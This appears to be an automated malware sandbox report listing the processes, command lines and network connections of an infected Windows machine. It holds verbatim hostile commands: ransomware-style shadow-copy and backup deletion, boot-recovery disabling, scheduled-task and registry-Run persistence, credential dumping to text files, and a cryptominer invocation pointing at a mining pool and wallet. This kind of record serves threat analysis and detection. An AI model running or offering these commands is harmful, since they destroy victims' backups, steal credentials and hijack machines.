
C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] vs

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "enuqrziy120" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "enuqrziy120" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {7E853A63-1D73-49DD-9AA7-22CA0C93FAD8} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

Network

Country Destination Domain Proto
DE 131.188.40.189:443 tcp
US 8.8.8.8:53 stats.walliant.com udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
N/A 127.0.0.1:49325 tcp
US 104.21.57.77:443 stats.walliant.com tcp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 api.joinmassive.com udp
US 18.172.89.91:443 api.joinmassive.com tcp
US 18.172.89.91:443 api.joinmassive.com tcp
IE 93.107.12.0:6893 udp
IE 93.107.12.1:6893 udp
IE 93.107.12.2:6893 udp
IE 93.107.12.3:6893 udp
IE 93.107.12.4:6893 udp
IE 93.107.12.5:6893 udp
IE 93.107.12.6:6893 udp
IE 93.107.12.7:6893 udp
IE 93.107.12.8:6893 udp
IE 93.107.12.9:6893 udp
IE 93.107.12.10:6893 udp
IE 93.107.12.11:6893 udp
IE 93.107.12.12:6893 udp
IE 93.107.12.13:6893 udp
IE 93.107.12.14:6893 udp
IE 93.107.12.15:6893 udp
IE 93.107.12.16:6893 udp
IE 93.107.12.17:6893 udp
IE 93.107.12.18:6893 udp
IE 93.107.12.19:6893 udp
IE 93.107.12.20:6893 udp
IE 93.107.12.21:6893 udp
IE 93.107.12.22:6893 udp
IE 93.107.12.23:6893 udp
IE 93.107.12.24:6893 udp
IE 93.107.12.25:6893 udp
IE 93.107.12.26:6893 udp
IE 93.107.12.27:6893 udp
IE 93.107.12.28:6893 udp
IE 93.107.12.29:6893 udp
IE 93.107.12.30:6893 udp
IE 93.107.12.31:6893 udp
TR 95.1.200.0:6893 udp
TR 95.1.200.1:6893 udp
TR 95.1.200.2:6893 udp
TR 95.1.200.3:6893 udp
TR 95.1.200.4:6893 udp
TR 95.1.200.5:6893 udp
TR 95.1.200.6:6893 udp
TR 95.1.200.7:6893 udp
TR 95.1.200.8:6893 udp
TR 95.1.200.9:6893 udp
TR 95.1.200.10:6893 udp
TR 95.1.200.11:6893 udp
TR 95.1.200.12:6893 udp
TR 95.1.200.13:6893 udp
TR 95.1.200.14:6893 udp
TR 95.1.200.15:6893 udp
TR 95.1.200.16:6893 udp
TR 95.1.200.17:6893 udp
TR 95.1.200.18:6893 udp
TR 95.1.200.19:6893 udp
TR 95.1.200.20:6893 udp
TR 95.1.200.21:6893 udp
TR 95.1.200.22:6893 udp
TR 95.1.200.23:6893 udp
TR 95.1.200.24:6893 udp
TR 95.1.200.25:6893 udp
TR 95.1.200.26:6893 udp
TR 95.1.200.27:6893 udp
TR 95.1.200.28:6893 udp
TR 95.1.200.29:6893 udp
TR 95.1.200.30:6893 udp
TR 95.1.200.31:6893 udp
FR 87.98.176.0:6893 udp
FR 87.98.176.1:6893 udp
FR 87.98.176.2:6893 udp
FR 87.98.176.3:6893 udp
FR 87.98.176.4:6893 udp
FR 87.98.176.5:6893 udp
FR 87.98.176.6:6893 udp
FR 87.98.176.7:6893 udp
FR 87.98.176.8:6893 udp
FR 87.98.176.9:6893 udp
FR 87.98.176.10:6893 udp
FR 87.98.176.11:6893 udp
FR 87.98.176.12:6893 udp
FR 87.98.176.13:6893 udp
FR 87.98.176.14:6893 udp
FR 87.98.176.15:6893 udp
FR 87.98.176.16:6893 udp
FR 87.98.176.17:6893 udp
FR 87.98.176.18:6893 udp
FR 87.98.176.19:6893 udp
FR 87.98.176.20:6893 udp
FR 87.98.176.21:6893 udp
FR 87.98.176.22:6893 udp
FR 87.98.176.23:6893 udp
FR 87.98.176.24:6893 udp
FR 87.98.176.25:6893 udp
FR 87.98.176.26:6893 udp
FR 87.98.176.27:6893 udp
FR 87.98.176.28:6893 udp
FR 87.98.176.29:6893 udp
FR 87.98.176.30:6893 udp
FR 87.98.176.31:6893 udp
FR 87.98.176.32:6893 udp
FR 87.98.176.33:6893 udp
FR 87.98.176.34:6893 udp
FR 87.98.176.35:6893 udp
FR 87.98.176.36:6893 udp
FR 87.98.176.37:6893 udp
FR 87.98.176.38:6893 udp
FR 87.98.176.39:6893 udp
FR 87.98.176.40:6893 udp
FR 87.98.176.41:6893 udp
FR 87.98.176.42:6893 udp
FR 87.98.176.43:6893 udp
FR 87.98.176.44:6893 udp
FR 87.98.176.45:6893 udp
FR 87.98.176.46:6893 udp
FR 87.98.176.47:6893 udp
FR 87.98.176.48:6893 udp
FR 87.98.176.49:6893 udp
FR 87.98.176.50:6893 udp
FR 87.98.176.51:6893 udp
FR 87.98.176.52:6893 udp
FR 87.98.176.53:6893 udp
FR 87.98.176.54:6893 udp
FR 87.98.176.55:6893 udp
FR 87.98.176.56:6893 udp
FR 87.98.176.57:6893 udp
FR 87.98.176.58:6893 udp
FR 87.98.176.59:6893 udp
FR 87.98.176.60:6893 udp
FR 87.98.176.61:6893 udp
FR 87.98.176.62:6893 udp
FR 87.98.176.63:6893 udp
FR 87.98.176.64:6893 udp
FR 87.98.176.65:6893 udp
FR 87.98.176.66:6893 udp
FR 87.98.176.67:6893 udp
FR 87.98.176.68:6893 udp
FR 87.98.176.69:6893 udp
FR 87.98.176.70:6893 udp
FR 87.98.176.71:6893 udp
FR 87.98.176.72:6893 udp
FR 87.98.176.73:6893 udp
FR 87.98.176.74:6893 udp
FR 87.98.176.75:6893 udp
FR 87.98.176.76:6893 udp
FR 87.98.176.77:6893 udp
FR 87.98.176.78:6893 udp
FR 87.98.176.79:6893 udp
FR 87.98.176.80:6893 udp
FR 87.98.176.81:6893 udp
FR 87.98.176.82:6893 udp
FR 87.98.176.83:6893 udp
FR 87.98.176.84:6893 udp
FR 87.98.176.85:6893 udp
FR 87.98.176.86:6893 udp
FR 87.98.176.87:6893 udp
FR 87.98.176.88:6893 udp
FR 87.98.176.89:6893 udp
FR 87.98.176.90:6893 udp
FR 87.98.176.91:6893 udp
FR 87.98.176.92:6893 udp
FR 87.98.176.93:6893 udp
FR 87.98.176.94:6893 udp
FR 87.98.176.95:6893 udp
FR 87.98.176.96:6893 udp
FR 87.98.176.97:6893 udp
FR 87.98.176.98:6893 udp
FR 87.98.176.99:6893 udp
FR 87.98.176.100:6893 udp
FR 87.98.176.101:6893 udp
FR 87.98.176.102:6893 udp
FR 87.98.176.103:6893 udp
FR 87.98.176.104:6893 udp
FR 87.98.176.105:6893 udp
FR 87.98.176.106:6893 udp
FR 87.98.176.107:6893 udp
FR 87.98.176.108:6893 udp
FR 87.98.176.109:6893 udp
FR 87.98.176.110:6893 udp
FR 87.98.176.111:6893 udp
FR 87.98.176.112:6893 udp
FR 87.98.176.113:6893 udp
FR 87.98.176.114:6893 udp
FR 87.98.176.115:6893 udp
FR 87.98.176.116:6893 udp
FR 87.98.176.117:6893 udp
FR 87.98.176.118:6893 udp
FR 87.98.176.119:6893 udp
FR 87.98.176.120:6893 udp
FR 87.98.176.121:6893 udp
FR 87.98.176.122:6893 udp
FR 87.98.176.123:6893 udp
FR 87.98.176.124:6893 udp
FR 87.98.176.125:6893 udp
FR 87.98.176.126:6893 udp
FR 87.98.176.127:6893 udp
FR 87.98.176.128:6893 udp
FR 87.98.176.129:6893 udp
FR 87.98.176.130:6893 udp
FR 87.98.176.131:6893 udp
FR 87.98.176.132:6893 udp
FR 87.98.176.133:6893 udp
FR 87.98.176.134:6893 udp
FR 87.98.176.135:6893 udp
FR 87.98.176.136:6893 udp
FR 87.98.176.137:6893 udp
FR 87.98.176.138:6893 udp
FR 87.98.176.139:6893 udp
FR 87.98.176.140:6893 udp
FR 87.98.176.141:6893 udp
FR 87.98.176.142:6893 udp
FR 87.98.176.143:6893 udp
FR 87.98.176.144:6893 udp
FR 87.98.176.145:6893 udp
FR 87.98.176.146:6893 udp
FR 87.98.176.147:6893 udp
FR 87.98.176.148:6893 udp
FR 87.98.176.149:6893 udp
FR 87.98.176.150:6893 udp
FR 87.98.176.151:6893 udp
FR 87.98.176.152:6893 udp
FR 87.98.176.153:6893 udp
FR 87.98.176.154:6893 udp
FR 87.98.176.155:6893 udp
FR 87.98.176.156:6893 udp
FR 87.98.176.157:6893 udp
FR 87.98.176.158:6893 udp
FR 87.98.176.159:6893 udp
FR 87.98.176.160:6893 udp
FR 87.98.176.161:6893 udp
FR 87.98.176.162:6893 udp
FR 87.98.176.163:6893 udp
FR 87.98.176.164:6893 udp
FR 87.98.176.165:6893 udp
FR 87.98.176.166:6893 udp
FR 87.98.176.167:6893 udp
FR 87.98.176.168:6893 udp
FR 87.98.176.169:6893 udp
FR 87.98.176.170:6893 udp
FR 87.98.176.171:6893 udp
FR 87.98.176.172:6893 udp
FR 87.98.176.173:6893 udp
FR 87.98.176.174:6893 udp
FR 87.98.176.175:6893 udp
FR 87.98.176.176:6893 udp
FR 87.98.176.177:6893 udp
FR 87.98.176.178:6893 udp
FR 87.98.176.179:6893 udp
FR 87.98.176.180:6893 udp
FR 87.98.176.181:6893 udp
FR 87.98.176.182:6893 udp
FR 87.98.176.183:6893 udp
FR 87.98.176.184:6893 udp
FR 87.98.176.185:6893 udp
FR 87.98.176.186:6893 udp
FR 87.98.176.187:6893 udp
FR 87.98.176.188:6893 udp
FR 87.98.176.189:6893 udp
FR 87.98.176.190:6893 udp
FR 87.98.176.191:6893 udp
FR 87.98.176.192:6893 udp
FR 87.98.176.193:6893 udp
FR 87.98.176.194:6893 udp
FR 87.98.176.195:6893 udp
FR 87.98.176.196:6893 udp
FR 87.98.176.197:6893 udp
FR 87.98.176.198:6893 udp
FR 87.98.176.199:6893 udp
FR 87.98.176.200:6893 udp
FR 87.98.176.201:6893 udp
FR 87.98.176.202:6893 udp
FR 87.98.176.203:6893 udp
FR 87.98.176.204:6893 udp
FR 87.98.176.205:6893 udp
FR 87.98.176.206:6893 udp
FR 87.98.176.207:6893 udp
FR 87.98.176.208:6893 udp
FR 87.98.176.209:6893 udp
FR 87.98.176.210:6893 udp
FR 87.98.176.211:6893 udp
FR 87.98.176.212:6893 udp
FR 87.98.176.213:6893 udp
FR 87.98.176.214:6893 udp
FR 87.98.176.215:6893 udp
FR 87.98.176.216:6893 udp
FR 87.98.176.217:6893 udp
FR 87.98.176.218:6893 udp
FR 87.98.176.219:6893 udp
FR 87.98.176.220:6893 udp
FR 87.98.176.221:6893 udp
FR 87.98.176.222:6893 udp
FR 87.98.176.223:6893 udp
FR 87.98.176.224:6893 udp
FR 87.98.176.225:6893 udp
FR 87.98.176.226:6893 udp
FR 87.98.176.227:6893 udp
FR 87.98.176.228:6893 udp
FR 87.98.176.229:6893 udp
FR 87.98.176.230:6893 udp
FR 87.98.176.231:6893 udp
FR 87.98.176.232:6893 udp
FR 87.98.176.233:6893 udp
FR 87.98.176.234:6893 udp
FR 87.98.176.235:6893 udp
FR 87.98.176.236:6893 udp
FR 87.98.176.237:6893 udp
FR 87.98.176.238:6893 udp
FR 87.98.176.239:6893 udp
FR 87.98.176.240:6893 udp
FR 87.98.176.241:6893 udp
FR 87.98.176.242:6893 udp
FR 87.98.176.243:6893 udp
FR 87.98.176.244:6893 udp
FR 87.98.176.245:6893 udp
FR 87.98.176.246:6893 udp
FR 87.98.176.247:6893 udp
FR 87.98.176.248:6893 udp
FR 87.98.176.249:6893 udp
FR 87.98.176.250:6893 udp
FR 87.98.176.251:6893 udp
FR 87.98.176.252:6893 udp
FR 87.98.176.253:6893 udp
FR 87.98.176.254:6893 udp
FR 87.98.176.255:6893 udp
FR 87.98.177.0:6893 udp
FR 87.98.177.1:6893 udp
FR 87.98.177.2:6893 udp
FR 87.98.177.3:6893 udp
FR 87.98.177.4:6893 udp
FR 87.98.177.5:6893 udp
FR 87.98.177.6:6893 udp
FR 87.98.177.7:6893 udp
FR 87.98.177.8:6893 udp
FR 87.98.177.9:6893 udp
FR 87.98.177.10:6893 udp
FR 87.98.177.11:6893 udp
FR 87.98.177.12:6893 udp
FR 87.98.177.13:6893 udp
FR 87.98.177.14:6893 udp
FR 87.98.177.15:6893 udp
FR 87.98.177.16:6893 udp
FR 87.98.177.17:6893 udp
FR 87.98.177.18:6893 udp
FR 87.98.177.19:6893 udp
FR 87.98.177.20:6893 udp
FR 87.98.177.21:6893 udp
FR 87.98.177.22:6893 udp
FR 87.98.177.23:6893 udp
FR 87.98.177.24:6893 udp
FR 87.98.177.25:6893 udp
FR 87.98.177.26:6893 udp
FR 87.98.177.27:6893 udp
FR 87.98.177.28:6893 udp
FR 87.98.177.29:6893 udp
FR 87.98.177.30:6893 udp
FR 87.98.177.31:6893 udp
FR 87.98.177.32:6893 udp
FR 87.98.177.33:6893 udp
FR 87.98.177.34:6893 udp
FR 87.98.177.35:6893 udp
FR 87.98.177.36:6893 udp
FR 87.98.177.37:6893 udp
FR 87.98.177.38:6893 udp
FR 87.98.177.39:6893 udp
FR 87.98.177.40:6893 udp
FR 87.98.177.41:6893 udp
FR 87.98.177.42:6893 udp
FR 87.98.177.43:6893 udp
FR 87.98.177.44:6893 udp
FR 87.98.177.45:6893 udp
FR 87.98.177.46:6893 udp
FR 87.98.177.47:6893 udp
FR 87.98.177.48:6893 udp
FR 87.98.177.49:6893 udp
FR 87.98.177.50:6893 udp
FR 87.98.177.51:6893 udp
FR 87.98.177.52:6893 udp
FR 87.98.177.53:6893 udp
FR 87.98.177.54:6893 udp
FR 87.98.177.55:6893 udp
FR 87.98.177.56:6893 udp
FR 87.98.177.57:6893 udp
FR 87.98.177.58:6893 udp
FR 87.98.177.59:6893 udp
FR 87.98.177.60:6893 udp
FR 87.98.177.61:6893 udp
FR 87.98.177.62:6893 udp
FR 87.98.177.63:6893 udp
FR 87.98.177.64:6893 udp
FR 87.98.177.65:6893 udp
FR 87.98.177.66:6893 udp
FR 87.98.177.67:6893 udp
FR 87.98.177.68:6893 udp
FR 87.98.177.69:6893 udp
FR 87.98.177.70:6893 udp
FR 87.98.177.71:6893 udp
FR 87.98.177.72:6893 udp
FR 87.98.177.73:6893 udp
FR 87.98.177.74:6893 udp
FR 87.98.177.75:6893 udp
FR 87.98.177.76:6893 udp
FR 87.98.177.77:6893 udp
FR 87.98.177.78:6893 udp
FR 87.98.177.79:6893 udp
FR 87.98.177.80:6893 udp
FR 87.98.177.81:6893 udp
FR 87.98.177.82:6893 udp
FR 87.98.177.83:6893 udp
FR 87.98.177.84:6893 udp
FR 87.98.177.85:6893 udp
FR 87.98.177.86:6893 udp
FR 87.98.177.87:6893 udp
FR 87.98.177.88:6893 udp
FR 87.98.177.89:6893 udp
FR 87.98.177.90:6893 udp
FR 87.98.177.91:6893 udp
FR 87.98.177.92:6893 udp
FR 87.98.177.93:6893 udp
FR 87.98.177.94:6893 udp
FR 87.98.177.95:6893 udp
FR 87.98.177.96:6893 udp
FR 87.98.177.97:6893 udp
FR 87.98.177.98:6893 udp
FR 87.98.177.99:6893 udp
FR 87.98.177.100:6893 udp
FR 87.98.177.101:6893 udp
FR 87.98.177.102:6893 udp
FR 87.98.177.103:6893 udp
FR 87.98.177.104:6893 udp
FR 87.98.177.105:6893 udp
FR 87.98.177.106:6893 udp
FR 87.98.177.107:6893 udp
FR 87.98.177.108:6893 udp
FR 87.98.177.109:6893 udp
FR 87.98.177.110:6893 udp
FR 87.98.177.111:6893 udp
FR 87.98.177.112:6893 udp
FR 87.98.177.113:6893 udp
FR 87.98.177.114:6893 udp
FR 87.98.177.115:6893 udp
FR 87.98.177.116:6893 udp
FR 87.98.177.117:6893 udp
FR 87.98.177.118:6893 udp
FR 87.98.177.119:6893 udp
FR 87.98.177.120:6893 udp
FR 87.98.177.121:6893 udp
FR 87.98.177.122:6893 udp
FR 87.98.177.123:6893 udp
FR 87.98.177.124:6893 udp
FR 87.98.177.125:6893 udp
FR 87.98.177.126:6893 udp
FR 87.98.177.127:6893 udp
FR 87.98.177.128:6893 udp
FR 87.98.177.129:6893 udp
FR 87.98.177.130:6893 udp
FR 87.98.177.131:6893 udp
FR 87.98.177.132:6893 udp
FR 87.98.177.133:6893 udp
FR 87.98.177.134:6893 udp
FR 87.98.177.135:6893 udp
FR 87.98.177.136:6893 udp
FR 87.98.177.137:6893 udp
FR 87.98.177.138:6893 udp
FR 87.98.177.139:6893 udp
FR 87.98.177.140:6893 udp
FR 87.98.177.141:6893 udp
FR 87.98.177.142:6893 udp
FR 87.98.177.143:6893 udp
FR 87.98.177.144:6893 udp
FR 87.98.177.145:6893 udp
FR 87.98.177.146:6893 udp
FR 87.98.177.147:6893 udp
FR 87.98.177.148:6893 udp
FR 87.98.177.149:6893 udp
FR 87.98.177.150:6893 udp
FR 87.98.177.151:6893 udp
FR 87.98.177.152:6893 udp
FR 87.98.177.153:6893 udp
FR 87.98.177.154:6893 udp
FR 87.98.177.155:6893 udp
FR 87.98.177.156:6893 udp
FR 87.98.177.157:6893 udp
FR 87.98.177.158:6893 udp
FR 87.98.177.159:6893 udp
FR 87.98.177.160:6893 udp
FR 87.98.177.161:6893 udp
FR 87.98.177.162:6893 udp
FR 87.98.177.163:6893 udp
FR 87.98.177.164:6893 udp
FR 87.98.177.165:6893 udp
FR 87.98.177.166:6893 udp
FR 87.98.177.167:6893 udp
FR 87.98.177.168:6893 udp
FR 87.98.177.169:6893 udp
FR 87.98.177.170:6893 udp
FR 87.98.177.171:6893 udp
FR 87.98.177.172:6893 udp
FR 87.98.177.173:6893 udp
FR 87.98.177.174:6893 udp
FR 87.98.177.175:6893 udp
FR 87.98.177.176:6893 udp
FR 87.98.177.177:6893 udp
FR 87.98.177.178:6893 udp
FR 87.98.177.179:6893 udp
FR 87.98.177.180:6893 udp
FR 87.98.177.181:6893 udp
FR 87.98.177.182:6893 udp
FR 87.98.177.183:6893 udp
FR 87.98.177.184:6893 udp
FR 87.98.177.185:6893 udp
FR 87.98.177.186:6893 udp
FR 87.98.177.187:6893 udp
FR 87.98.177.188:6893 udp
FR 87.98.177.189:6893 udp
FR 87.98.177.190:6893 udp
FR 87.98.177.191:6893 udp
FR 87.98.177.192:6893 udp
FR 87.98.177.193:6893 udp
FR 87.98.177.194:6893 udp
FR 87.98.177.195:6893 udp
FR 87.98.177.196:6893 udp
FR 87.98.177.197:6893 udp
FR 87.98.177.198:6893 udp
FR 87.98.177.199:6893 udp
FR 87.98.177.200:6893 udp
FR 87.98.177.201:6893 udp
FR 87.98.177.202:6893 udp
FR 87.98.177.203:6893 udp
FR 87.98.177.204:6893 udp
FR 87.98.177.205:6893 udp
FR 87.98.177.206:6893 udp
FR 87.98.177.207:6893 udp
FR 87.98.177.208:6893 udp
FR 87.98.177.209:6893 udp
FR 87.98.177.210:6893 udp
FR 87.98.177.211:6893 udp
FR 87.98.177.212:6893 udp
FR 87.98.177.213:6893 udp
FR 87.98.177.214:6893 udp
FR 87.98.177.215:6893 udp
FR 87.98.177.216:6893 udp
FR 87.98.177.217:6893 udp
FR 87.98.177.218:6893 udp
FR 87.98.177.219:6893 udp
FR 87.98.177.220:6893 udp
FR 87.98.177.221:6893 udp
FR 87.98.177.222:6893 udp
FR 87.98.177.223:6893 udp
FR 87.98.177.224:6893 udp
FR 87.98.177.225:6893 udp
FR 87.98.177.226:6893 udp
FR 87.98.177.227:6893 udp
FR 87.98.177.228:6893 udp
FR 87.98.177.229:6893 udp
FR 87.98.177.230:6893 udp
FR 87.98.177.231:6893 udp
FR 87.98.177.232:6893 udp
FR 87.98.177.233:6893 udp
FR 87.98.177.234:6893 udp
FR 87.98.177.235:6893 udp
FR 87.98.177.236:6893 udp
FR 87.98.177.237:6893 udp
FR 87.98.177.238:6893 udp
FR 87.98.177.239:6893 udp
FR 87.98.177.240:6893 udp
FR 87.98.177.241:6893 udp
FR 87.98.177.242:6893 udp
FR 87.98.177.243:6893 udp
FR 87.98.177.244:6893 udp
FR 87.98.177.245:6893 udp
FR 87.98.177.246:6893 udp
FR 87.98.177.247:6893 udp
FR 87.98.177.248:6893 udp
FR 87.98.177.249:6893 udp
FR 87.98.177.250:6893 udp
FR 87.98.177.251:6893 udp
FR 87.98.177.252:6893 udp
FR 87.98.177.253:6893 udp
FR 87.98.177.254:6893 udp
FR 87.98.177.255:6893 udp
FR 87.98.178.0:6893 udp
FR 87.98.178.1:6893 udp
FR 87.98.178.2:6893 udp
FR 87.98.178.3:6893 udp
FR 87.98.178.4:6893 udp
FR 87.98.178.5:6893 udp
FR 87.98.178.6:6893 udp
FR 87.98.178.7:6893 udp
FR 87.98.178.8:6893 udp
FR 87.98.178.9:6893 udp
FR 87.98.178.10:6893 udp
FR 87.98.178.11:6893 udp
FR 87.98.178.12:6893 udp
FR 87.98.178.13:6893 udp
FR 87.98.178.14:6893 udp
FR 87.98.178.15:6893 udp
FR 87.98.178.16:6893 udp
FR 87.98.178.17:6893 udp
FR 87.98.178.18:6893 udp
FR 87.98.178.19:6893 udp
FR 87.98.178.20:6893 udp
FR 87.98.178.21:6893 udp
FR 87.98.178.22:6893 udp
FR 87.98.178.23:6893 udp
FR 87.98.178.24:6893 udp
FR 87.98.178.25:6893 udp
FR 87.98.178.26:6893 udp
FR 87.98.178.27:6893 udp
FR 87.98.178.28:6893 udp
FR 87.98.178.29:6893 udp
FR 87.98.178.30:6893 udp
FR 87.98.178.31:6893 udp
FR 87.98.178.32:6893 udp
FR 87.98.178.33:6893 udp
FR 87.98.178.34:6893 udp
FR 87.98.178.35:6893 udp
FR 87.98.178.36:6893 udp
FR 87.98.178.37:6893 udp
FR 87.98.178.38:6893 udp
FR 87.98.178.39:6893 udp
FR 87.98.178.40:6893 udp
FR 87.98.178.41:6893 udp
FR 87.98.178.42:6893 udp
FR 87.98.178.43:6893 udp
FR 87.98.178.44:6893 udp
FR 87.98.178.45:6893 udp
FR 87.98.178.46:6893 udp
FR 87.98.178.47:6893 udp
FR 87.98.178.48:6893 udp
FR 87.98.178.49:6893 udp
FR 87.98.178.50:6893 udp
FR 87.98.178.51:6893 udp
FR 87.98.178.52:6893 udp
FR 87.98.178.53:6893 udp
FR 87.98.178.54:6893 udp
FR 87.98.178.55:6893 udp
FR 87.98.178.56:6893 udp
FR 87.98.178.57:6893 udp
FR 87.98.178.58:6893 udp
FR 87.98.178.59:6893 udp
FR 87.98.178.60:6893 udp
FR 87.98.178.61:6893 udp
FR 87.98.178.62:6893 udp
FR 87.98.178.63:6893 udp
FR 87.98.178.64:6893 udp
FR 87.98.178.65:6893 udp
FR 87.98.178.66:6893 udp
FR 87.98.178.67:6893 udp
FR 87.98.178.68:6893 udp
FR 87.98.178.69:6893 udp
FR 87.98.178.70:6893 udp
FR 87.98.178.71:6893 udp
FR 87.98.178.72:6893 udp
FR 87.98.178.73:6893 udp
FR 87.98.178.74:6893 udp
FR 87.98.178.75:6893 udp
FR 87.98.178.76:6893 udp
FR 87.98.178.77:6893 udp
FR 87.98.178.78:6893 udp
FR 87.98.178.79:6893 udp
FR 87.98.178.80:6893 udp
FR 87.98.178.81:6893 udp
FR 87.98.178.82:6893 udp
FR 87.98.178.83:6893 udp
FR 87.98.178.84:6893 udp
FR 87.98.178.85:6893 udp
FR 87.98.178.86:6893 udp
FR 87.98.178.87:6893 udp
FR 87.98.178.88:6893 udp
FR 87.98.178.89:6893 udp
FR 87.98.178.90:6893 udp
FR 87.98.178.91:6893 udp
FR 87.98.178.92:6893 udp
FR 87.98.178.93:6893 udp
FR 87.98.178.94:6893 udp
FR 87.98.178.95:6893 udp
FR 87.98.178.96:6893 udp
FR 87.98.178.97:6893 udp
FR 87.98.178.98:6893 udp
FR 87.98.178.99:6893 udp
FR 87.98.178.100:6893 udp
FR 87.98.178.101:6893 udp
FR 87.98.178.102:6893 udp
FR 87.98.178.103:6893 udp
FR 87.98.178.104:6893 udp
FR 87.98.178.105:6893 udp
FR 87.98.178.106:6893 udp
FR 87.98.178.107:6893 udp
FR 87.98.178.108:6893 udp
FR 87.98.178.109:6893 udp
FR 87.98.178.110:6893 udp
FR 87.98.178.111:6893 udp
FR 87.98.178.112:6893 udp
FR 87.98.178.113:6893 udp
FR 87.98.178.114:6893 udp
FR 87.98.178.115:6893 udp
FR 87.98.178.116:6893 udp
FR 87.98.178.117:6893 udp
FR 87.98.178.118:6893 udp
FR 87.98.178.119:6893 udp
FR 87.98.178.120:6893 udp
FR 87.98.178.121:6893 udp
FR 87.98.178.122:6893 udp
FR 87.98.178.123:6893 udp
FR 87.98.178.124:6893 udp
FR 87.98.178.125:6893 udp
FR 87.98.178.126:6893 udp
FR 87.98.178.127:6893 udp
FR 87.98.178.128:6893 udp
FR 87.98.178.129:6893 udp
FR 87.98.178.130:6893 udp
FR 87.98.178.131:6893 udp
FR 87.98.178.132:6893 udp
FR 87.98.178.133:6893 udp
FR 87.98.178.134:6893 udp
FR 87.98.178.135:6893 udp
FR 87.98.178.136:6893 udp
FR 87.98.178.137:6893 udp
FR 87.98.178.138:6893 udp
